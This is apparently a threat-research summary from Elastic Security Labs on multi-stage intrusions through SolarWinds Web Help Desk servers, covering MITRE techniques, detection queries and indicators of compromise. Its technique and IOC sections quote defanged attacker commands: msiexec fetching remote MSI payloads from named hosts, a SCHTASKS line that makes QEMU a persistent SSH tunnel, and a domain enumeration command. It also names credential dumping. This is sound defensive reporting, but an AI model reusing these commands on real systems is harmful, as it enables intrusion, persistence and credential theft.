Threat Research

SolarWinds Web Help Desk Exploitation – February 2026 — Elastic Security Labs

Elastic.co
SolarWinds Web Help Desk Exploitation – February 2026 — Elastic Security Labs

Microsoft and others reported exploitation of Internet-facing SolarWinds Web Help Desk servers that enabled multi-stage intrusions beginning in December 2025, involving remote MSI installations, abuse of RMM tooling, and credential dumping. Elastic and Microsoft observed use of legitimate tools (Velociraptor, Cloudflared, QEMU) for persistence and tunneling, and Elastic published detection and prevention rules to detect the activity. #SolarWindsWHD #Velociraptor

Keypoints

  • Microsoft reported exploitation of SolarWinds Web Help Desk (WHD) servers that led to multi-stage intrusions first observed in December 2025 and publicly reported on February 6, 2026.
  • The activity may be linked to one of several WHD vulnerabilities: CVE-2025-26399, CVE-2025-40536, or CVE-2025-40551, affecting multiple WHD versions.
  • Adversaries used living-off-the-land techniques and installed remotely-hosted MSI packages to deploy RMM agents and legitimate tools (Velociraptor, Cloudflared) to perform post-compromise execution and tunneling.
  • Operators performed discovery and credential access actions including Active Directory enumeration, DCSync, and extraction of the NTDS.dit database, and they disabled security controls like Defender and the Windows Firewall.
  • Persistence was maintained by creating a scheduled task (TPMProfiler) that launched QEMU to provide SSH tunneling/remote access (hostfwd tcp::22022-:22) and by leveraging RMM functionality for continued access.
  • Elastic Security and Elastic Defend provide multiple prebuilt detections and prevention rules for suspicious WHD child processes, remote MSI installations, scheduled-task QEMU execution, tunneling activity, and credential dumping; Elastic has not observed telemetry of this activity in its datasets as of publication.
  • Recommended actions include applying WHD patches, rotating associated credentials, reviewing impacted hosts for unauthorized activity, and removing or tightly monitoring RMM usage.

MITRE Techniques

  • [T1190 ] Exploit Public-Facing Application – WHD servers were exploited to gain initial access. (‘exploitation of SolarWinds Web Help Desk (WHD)’)
  • [T1059.001 ] PowerShell – Adversaries executed commands and scripts using native interpreters observed as child processes (cmd.exe, powershell.exe) spawned from WHD Java process. (‘process.name : (“cmd.exe”, “powershell.exe”, “rundll32.exe”) and process.parent.executable : (“C:Program FilesWebHelpDesk*java*.exe”, “C:Program Files (x86)WebHelpDesk*java*.exe”)’)
  • [T1563 ] Remote Service Session Hijacking – Attackers established tunneled remote access (Cloudflared, QEMU) and configured SSH/remote ports to maintain sessions. (‘SCHTASKS … /TR “C:Userstmpqemu-system-x86_64.exe … -netdev user,id=net0,hostfwd=tcp::22022-:22″‘)
  • [T1003.001 ] OS Credential Dumping: LSASS Memory – Credential dumping and Active Directory credential theft were observed, including DCSync and NTDS.dit extraction. (‘credential dumping of the Active Directory Domain Database (ntds.dit)’)
  • [T1053.005 ] Scheduled Task/Job – Persistence achieved by creating a scheduled task (TPMProfiler) to launch QEMU on system startup. (‘SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN “TPMProfiler” /TR “C:Userstmpqemu-system-x86_64.exe …”‘)

Indicators of Compromise

  • [Domain/URL ] Remote-hosted MSI installers used for initial deployment – hxxps://files.catbox[.]moe/tmp9fc.msi, hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/…/v4.msi and other hosted MSI URLs (e.g., cloudflared release URL).
  • [File name ] Tools and payloads observed on disk – qemu-system-x86_64.exe, cloudflared-windows-amd64.msi (also referenced: Velociraptor MSI, vault.db, NTDS.dit).
  • [Scheduled Task ] Persistence artifact – TPMProfiler scheduled task created with SCHTASKS to launch QEMU at system startup (command includes hostfwd tcp::22022-:22).
  • [Command-line ] Notable command-line activity used for installation and discovery – “msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi”, “msiexec /q /i hxxps://…/v4.msi”, and “net group “domain computers” /do”.
  • [CVE ] Vulnerabilities referenced as potential initial vectors – CVE-2025-26399, CVE-2025-40536 (and CVE-2025-40551 referenced in reporting).

Read more: https://www.elastic.co/security-labs/solarwinds-whd-exploitation